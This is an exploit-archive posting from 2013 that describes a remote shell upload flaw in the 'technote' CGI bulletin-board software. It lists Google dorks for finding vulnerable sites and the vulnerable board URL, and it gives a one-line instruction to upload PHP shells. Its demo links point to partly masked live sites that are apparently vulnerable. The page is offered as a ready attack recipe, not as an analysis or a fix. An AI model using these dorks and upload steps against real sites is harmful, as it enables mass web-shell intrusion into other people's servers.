Home / exploits Technote cgi Remote Shell Upload Vulnerability
Posted on 31 August 2013
<pre>################# In The Name Of Allah ################ # # [+] Exploit Title: technote cgi Remote Shell Upload Vulnerability # [+] Google Dork 1 : inurl:/cgi-bin/technote/ # [+] Google Dork 2 : inurl:".cgi?board=FREE_BOARD" # [+] Google Dork 3 : intext:"TECHNOTE-TOP" # [+] Date: 30-08-2013 # [+] Exploit Author: Iranian_Dark_Coders_Team # [+] Home : www.idc-team.net # [+] Discovered By : am22[Hacker Pir] # [+] Category: webapps # [+] Tested on: Windows 7 # [+] Vendor Homepage : http://www.technote.co.kr # ####################################################### # # [+] Exploit: # # [+] http://localhost/[path]/cgi-bin/technote/main.cgi?board=FREE_BOARD # ####################################################### # # [+] Proof: # # [+] Then fill in all the information requested and find shell etc... # [+] Operation : Upload PhP Shells or html etc... # ####################################################### # # [+] Demo : # [+] http://www.stiXXXaterkbc.org/cgi-bin/technote/aa.cgi?board=FREE_BOARD&command=write_form&answer=1078830343&nnew=1 # [+] http://www.pXXXo.co.kr/cgi-bin/technote/main.cgi?board=FREE_BOARD&command=write_form # ####################################################### # # [+] Discovered By : am22[Hacker Pir] # [+] Spc Tnx : M.R.S.CO,N3O,Black.Hack3r,and all Members idc-team.net # ####################################################### </pre>
